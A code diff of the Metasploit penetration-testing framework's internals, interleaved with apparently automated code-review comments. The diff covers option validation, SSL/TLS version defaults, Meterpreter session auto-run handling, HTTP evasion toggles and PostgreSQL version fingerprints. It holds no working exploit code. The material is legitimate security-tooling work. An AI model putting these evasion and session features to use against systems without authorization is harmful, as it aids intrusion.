diff --git a/.mailmap b/.mailmap index 3dafb94713..7ab2a7147d 100644 --- a/.mailmap +++ b/.mailmap @@ -114,6 +114,7 @@ m-1-k-3 Michael Messner Meatballs1 Meatballs1 mubix Rob Fuller +net-ninja Steven Seeley nevdull77 Patrik Karlsson nmonkee nmonkee nullbind nullbind diff --git a/Gemfile.lock b/Gemfile.lock index 9baf553c05..4daa391b99 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.16) + metasploit-framework (4.11.18) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.2) + metasploit-payloads (= 1.1.3) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.2) + metasploit-payloads (1.1.3) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/data/exploits/R7_2015_17/stream.raw b/data/exploits/R7_2015_17/stream.raw new file mode 100644 index 0000000000..aa17f76ea2 Binary files /dev/null and b/data/exploits/R7_2015_17/stream.raw differ diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ed1dbf948b..ec28016010 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.16" + VERSION = "4.11.18" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 4878180280..ca31d16d87 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb 
@@ -27,7 +27,7 @@ class Config < Hash # @return [String] the base configuration directory def self.get_config_root - # Use MSFCFGDIR environment variable first. See feature request #5797 + # Use MSF_CFGROOT_CONFIG environment variable first. val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG') if (val and File.directory?(val)) return val diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index d22ac17dbc..86b5ab5e68 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -216,7 +216,7 @@ class CommandShell end end - if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false) + if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty? args = Shellwords.shellwords( datastore['InitialAutoRunScript'] ) print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'") execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 789f25c801..b2863874e8 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -37,13 +37,13 @@ module MeterpreterOptions framework.sessions.schedule Proc.new { # Configure unicode encoding before loading stdapi - session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false ) + session.encode_unicode = datastore['EnableUnicodeEncoding'] session.init_ui(self.user_input, self.user_output) valid = true - if datastore['AutoVerifySession'] == true + if datastore['AutoVerifySession'] if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) print_error("Meterpreter session #{session.sid} is not valid and will be closed") valid = false @@ -52,7 +52,7 @@ module MeterpreterOptions if valid - if datastore['AutoLoadStdapi'] == true + if datastore['AutoLoadStdapi'] session.load_stdapi 
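Review bot: The bare truthiness tests introduced in the meterpreter_options.rb hunks (`session.encode_unicode = datastore['EnableUnicodeEncoding']`, `if datastore['AutoVerifySession']`, `if datastore['AutoLoadStdapi']`) are only equivalent to the removed explicit comparisons when the stored value is a real boolean, and this diff does not show that guarantee. data_store.rb's `[]=` normalizes a value only when `@options[k]` holds a registered option, and `import_options_from_hash` calls `import_option` without an option (so `@options[key]` becomes nil) and stores via `self.store`, which bypasses `[]=`; a key that reaches the datastore on either path keeps its String, and the String `"false"` is truthy in Ruby, so such an option would read as enabled. The same pattern is used in the hunks for vncinject_options.rb, exploit.rb (`define_context_encoding_reqs`), http/server.rb, browser_exploit_server.rb, sunrpc.rb, module.rb (`debugging?`), ui/message.rb, ui/message/verbose.rb, prepend_migrate.rb, command_dispatcher/exploit.rb and console/driver.rb; `debugging?` and the `framework.datastore['VERBOSE']`/`['TimestampOutput']` lookups are the ones most likely to read keys that were never registered through `import_options`. If every such key is guaranteed to pass `OptBool#normalize` first, a one-line comment on `DataStore#[]=` stating that contract would make the assumption reviewable; otherwise `encode_unicode` should at least receive `!!datastore['EnableUnicodeEncoding']` so the session attribute stays a boolean.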
@@ -72,7 +72,7 @@ module MeterpreterOptions end [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - if (datastore[key].empty? == false) + if !datastore[key].empty? args = Shellwords.shellwords( datastore[key] ) print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") session.execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 05962133fc..d86a5f4dbd 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -84,7 +84,7 @@ module VncInjectOptions print_status("Local TCP relay started.") # If the AUTOVNC flag is set, launch VNC viewer. - if (datastore['AUTOVNC'] == true) + if datastore['AUTOVNC'] if (session.autovnc(datastore['ViewOnly'])) print_status("Launched vncviewer.") else diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index e52ff259de..4fd18ca9c3 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]), + Opt::SSLVersion ], self.class ) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f4da1911e0..eeecd6ea38 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -13,6 +13,7 @@ class DataStore < Hash # Initializes the data store's internal state. # def initialize() + @options = Hash.new @imported = Hash.new @imported_by = Hash.new end 
@@ -26,6 +27,14 @@ class DataStore < Hash @imported[k] = false @imported_by[k] = nil + opt = @options[k] + unless opt.nil? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"]) + end + v = opt.normalize(v) + end + super(k,v) end @@ -65,17 +74,11 @@ class DataStore < Hash # all of the supplied options # def import_options(options, imported_by = nil, overwrite = false) - options.each_option { |name, opt| - # If there's already a value defined for this option, then skip it - # and don't import it. - next if self.has_key?(name) and overwrite == false - - # If the option has a default value, import it, but only if the - # datastore doesn't already have a value set for it. - if ((opt.default != nil) and (overwrite or self[name] == nil)) - import_option(name, opt.default.to_s, true, imported_by) + options.each_option do |name, opt| + if self[name].nil? || overwrite + import_option(name, opt.default, true, imported_by, opt) end - } + end end # @@ -124,13 +127,14 @@ class DataStore < Hash # def import_options_from_hash(option_hash, imported = true, imported_by = nil) option_hash.each_pair { |key, val| - import_option(key, val.to_s, imported, imported_by) + import_option(key, val, imported, imported_by) } end - def import_option(key, val, imported=true, imported_by=nil) + def import_option(key, val, imported=true, imported_by=nil, option=nil) self.store(key, val) + @options[key] = option @imported[key] = imported @imported_by[key] = imported_by end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 60d421b617..4e4ba8315c 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb 
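Review bot: `import_option` now assigns `@options[key] = option` unconditionally while `import_options_from_hash` still calls it without an option, so importing a hash for a key that `import_options` already registered replaces that key's validator with nil and later `datastore[key] = v` assignments skip `valid?`/`normalize`; `@options[key] = option if option` would keep the registration. Separately, the `OptionValidateError` raised in `[]=` appends `['', ', try harder'].sample` to its message, which makes the error text non-deterministic and awkward to match in logs or specs; the message should be fixed text. Note also that `import_options` now calls `import_option(name, opt.default, ...)` even when `opt.default` is nil, so `self.store(name, nil)` creates a key for every registered option, which changes any `has_key?`-based check elsewhere that relied on absent keys (none visible here).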
@@ -163,14 +163,4 @@ class Msf::DBManager true end - - # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6. - # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond. - def warn_about_rubies - if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/ - $stderr.puts "**************************************************************************************" - $stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/" - $stderr.puts "**************************************************************************************" - end - end end diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 076107891e..c483d25358 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -537,7 +537,7 @@ protected # def find_context_key(buf, badchars, state) # Make sure our context information file is sane - if File.exists?(datastore['ContextInformationFile']) == false + if !File.exists?(datastore['ContextInformationFile']) raise NoKeyError, "A context information file must specified when using context encoding", caller end diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 7e36ad1a80..f70884cdb3 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1506,7 +1506,7 @@ protected # required when wanting to support context keyed encoding # def define_context_encoding_reqs(reqs) - return if datastore['EnableContextEncoding'] != true + return unless datastore['EnableContextEncoding'] # At present, we don't support any automatic methods of obtaining # context information. In the future, we might support obtaining diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..5b57e2e408 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
@@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), + Opt::SSLVersion, OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']), OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']) @@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient # # Remaining evasions to implement # -# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']), +# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]), # OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]), ], self.class ) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6a101b9316..7eb5370411 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
@@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer register_evasion_options( [ - OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']), - OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']), - OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']), + OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), + OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), + OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]), OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache']) ], Exploit::Remote::HttpServer @@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end @@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer response.compress = datastore['HTTP::compression'] end - if (datastore['HTTP::chunked'] == true) + if datastore['HTTP::chunked'] response.auto_cl = false response.transfer_chunked = true end - if (datastore['HTTP::header_folding'] == true) + if datastore['HTTP::header_folding'] response.headers.fold = 1 end - if (datastore['HTTP::junk_headers'] == true) + if datastore['HTTP::junk_headers'] response.headers.junk_headers = 1 end diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..37c9a201d5 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb 
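Review bot: `use_zlib` now raises whenever zlib is missing, regardless of the option: `HTTP::compression` is the `OptEnum` registered above with default `'none'`, and the String `'none'` is truthy, so `!Rex::Text.zlib_present? && datastore['HTTP::compression']` is true for the default value. The old `== true` comparison never matched an enum string either, so the check was dead before and is over-eager now. Use `if !Rex::Text.zlib_present? && %w[gzip deflate].include?(datastore['HTTP::compression'])` instead. `use_zlib`'s callers are outside the hunk.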
@@ -292,6 +292,8 @@ module Exploit::Remote::Postgres when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database + when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host # Windows diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1f6da0ecf5..466f03281c 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -588,7 +588,7 @@ module Msf if profile.nil? print_status("Browsing directly to the exploit URL is forbidden.") send_not_found(cli) - elsif profile[:tried] and datastore['Retries'] == false + elsif profile[:tried] && !datastore['Retries'] print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.") send_not_found(cli) else diff --git a/lib/msf/core/exploit/smb/client.rb b/lib/msf/core/exploit/smb/client.rb index b104b9e48a..df006885f7 100644 --- a/lib/msf/core/exploit/smb/client.rb +++ b/lib/msf/core/exploit/smb/client.rb @@ -64,7 +64,7 @@ module Msf register_options( [ Opt::RHOST, - OptInt.new('RPORT', [ true, 'Set the SMB service port', 445]) + OptPort.new('RPORT', [ true, 'The SMB service port', 445]) ], Msf::Exploit::Remote::SMB::Client) register_autofilter_ports([ 139, 445]) diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index f8c9055f30..265bea4ac5 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb 
@@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC register_evasion_options( [ - OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']), + OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]), ], Msf::Exploit::Remote::SunRPC ) @@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC } ) - if datastore['ONCRPC::tcp_request_fragmentation'] == true + if datastore['ONCRPC::tcp_request_fragmentation'] self.rpcobj.should_fragment = 1 end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index cfbdfe98a9..ec70f4ff4a 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -64,7 +64,7 @@ module Exploit::Remote::Tcp register_advanced_options( [ OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]), + Opt::SSLVersion, OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]), OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']), Opt::Proxies, diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb index a86a7a2b25..b791465dfd 100644 --- a/lib/msf/core/exploit/tcp_server.rb +++ b/lib/msf/core/exploit/tcp_server.rb 
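Review bot: Replacing the `SSLVersion` enum in tcp.rb with `Opt::SSLVersion` changes the default for every TCP client module from `'TLS1'` to `'Auto'` (defined in opt.rb in this same diff), and nothing in the diff documents that. Whether `'Auto'` can negotiate down to SSLv3/SSLv2 depends on how Rex maps the value, which is not visible here; a line in the changelog or in the shared option's description saying that the default changed and what `'Auto'` negotiates would let module authors who relied on the fixed TLS1 default re-pin it.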
@@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer [ OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]), # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment) - # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]), OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8fd5db9cb..b8e797c8ec 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -38,14 +38,6 @@ class Framework Revision = "$Revision$" - # Repository information - RepoRevision = ::Msf::Util::SVN.revision - RepoUpdated = ::Msf::Util::SVN.updated - RepoUpdatedDays = ::Msf::Util::SVN.days_since_update - RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly - RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date - RepoRoot = ::Msf::Util::SVN.root - # EICAR canary EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted? diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index fda6eebe8c..fe39a459b3 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -266,11 +266,10 @@ class Module end # - # Returns true if this module is being debugged. The debug flag is set - # by setting datastore['DEBUG'] to 1|true|yes + # Returns true if this module is being debugged. # def debugging? - (datastore['DEBUG'] || '') =~ /^(1|t|y)/i + datastore['DEBUG'] end # diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2879223d2f..64c846058b 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb 
@@ -60,15 +60,15 @@ module Msf::Module::Deprecated # # @return [void] def print_deprecation_warning - print_warning("*"*72) - print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") + print_warning("*"*90) + print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*") if deprecation_date - print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*") end if replacement_module - print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + print_warning("*"+"Use #{replacement_module} instead".center(88)+"*") end - print_warning("*"*72) + print_warning("*"*90) end def init_ui(input = nil, output = nil) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index bf4d228abc..c706a35702 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -14,9 +14,8 @@ module Msf::Module::UI::Message def print_prefix prefix = '' - if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( - framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i - ) + if datastore['TimestampOutput'] || + (framework && framework.datastore['TimestampOutput']) prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb index 1a8d0175b9..a47a7e8f11 100644 --- a/lib/msf/core/module/ui/message/verbose.rb +++ b/lib/msf/core/module/ui/message/verbose.rb 
@@ -1,21 +1,21 @@ module Msf::Module::UI::Message::Verbose # Verbose version of #print_error def vprint_error(msg='') - print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_good def vprint_good(msg='') - print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_status def vprint_status(msg='') - print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_warning def vprint_warning(msg='') - print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end end diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index ed9740634a..0fe7794797 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -147,11 +147,6 @@ module Msf # @param klass [Class] The module class # @return [void] def auto_subscribe_module(klass) - # If auto-subscribe has been disabled - if (framework.datastore['DisableAutoSubscribe'] and - framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/) - return - end # If auto-subscription is enabled (which it is by default), figure out # if it subscribes to any particular interfaces. diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 46f182e4f6..f311e4b767 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb 
@@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| - if entry.downcase == '.svn' - next - end - full_entry_path = ::File.join(path, entry) type = entry.singularize diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3df70e099a..a1a53a2c87 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -51,6 +51,13 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', [ false, + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', + ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + end + # These are unused but remain for historical reasons class << self alias builtin_chost CHOST @@ -69,6 +76,7 @@ module Msf Proxies = Proxies() RHOST = RHOST() RPORT = RPORT() + SSLVersion = SSLVersion() end end diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index 295ae04538..97fb9db7ec 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -7,24 +7,17 @@ module Msf # Network port option. # ### -class OptPort < OptBase +class OptPort < OptInt def type return 'port' end - def normalize(value) - value.to_i - end - def valid?(value) - return false if empty_required_value?(value) - - if ((value != nil and value.to_s.empty? == false) and - ((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535))) - return false + if !required? and value.to_s.empty? + super + else + super && normalize(value) <= 65535 && normalize(value) >= 0 end - - return super end end diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 7da13693d9..1ecc37f290 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb 
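Review bot: `OptPort#valid?` calls `normalize(value)` twice and mixes `and` with `&&`; binding once reads better: `port = normalize(value)` followed by `super && port.between?(0, 65535)` in the else branch. The range check also relies on `OptInt#valid?` (outside the hunk) rejecting non-numeric input before `normalize` is evaluated, which is worth a short comment on the `super &&` line since that short-circuit is what keeps `normalize` from seeing garbage. In `Opt.SSLVersion`, the YARD tag should say that `'Auto'` is the default and that the list still admits `SSL2`/`SSL3`, so callers of the shared option know what they inherit.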
@@ -13,7 +13,7 @@ class OptRaw < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/opt_regexp.rb b/lib/msf/core/opt_regexp.rb index d7056dd63b..bb743077db 100644 --- a/lib/msf/core/opt_regexp.rb +++ b/lib/msf/core/opt_regexp.rb @@ -29,7 +29,7 @@ class OptRegexp < OptBase def normalize(value) return nil if value.nil? - return Regexp.compile(value) + return Regexp.compile(value.to_s) end def display_value(value) diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 88818cb036..8b7499a940 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -13,7 +13,7 @@ class OptString < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb index 80ff558804..e884fa1aca 100644 --- a/lib/msf/core/payload/ruby.rb +++ b/lib/msf/core/payload/ruby.rb @@ -10,7 +10,7 @@ module Msf::Payload::Ruby [ # Since space restrictions aren't really a problem, default this to # true. - Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ]) ] ) end diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 58ad420cfe..b6ccf75131 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate # for discussion. # def prepend_migrate? - !!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true') + datastore['PrependMigrate'] end # diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 0a5506fa03..dc5ef2696d 100644 --- a/lib/msf/sanity.rb 
+++ b/lib/msf/sanity.rb @@ -3,36 +3,6 @@ # Provides some sanity checks against the ruby build and version # -# Check for the broken pack/unpack in OS X 10.4.x -if ([1].pack('n') == "\x01\x00") - $stderr.puts "*** This ruby build has a broken pack/unpack implementation! " - - if (RUBY_PLATFORM =~ /darwin/) - $stderr.puts " Apple shipped a broken version of ruby with the 10.4.x " - $stderr.puts " release. Please install ruby from source, or use one of " - $stderr.puts " the free package managers to obtain a working ruby build." - end - - exit(0) -end - -# Check for ruby 1.8.2 as the minimal supported version -if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/) - $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+" - exit(0) -end - -# Check for ruby 1.9.0 and throw a big nasty warning -if (RUBY_VERSION =~ /^1\.9\.0/) - $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer." - exit(0) -end - -# Check for ruby 1.9.1 and throw a warning -if (RUBY_VERSION =~ /^1\.9\.1/) - $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer." -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) 
@@ -56,56 +26,3 @@ rescue ::LoadError $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" end - - -# -# Check for the ugly 1.8.7 short-named constants bug -# - -class ConstBugTestA - Const = 'A' - def test - Const == 'A' - end -end - -ConstBugTestC = ConstBugTestA.dup - -class ConstBugTestB < ConstBugTestC - Const = 'B' -end - -def ruby_187_const_bug - bugged = false - - begin - ConstBugTestA.new.test() - ConstBugTestB.new.test() - rescue ::NameError - bugged = true - end - - bugged -end - -if(ruby_187_const_bug()) - $stderr.puts "" - $stderr.puts "***********************************************************************" - $stderr.puts "*** *" - $stderr.puts "*** This version of the Ruby interpreter contains a serious bug *" - $stderr.puts "*** related to short-named constants, we strongly recommend that you *" - $stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *" - $stderr.puts "*** backported the 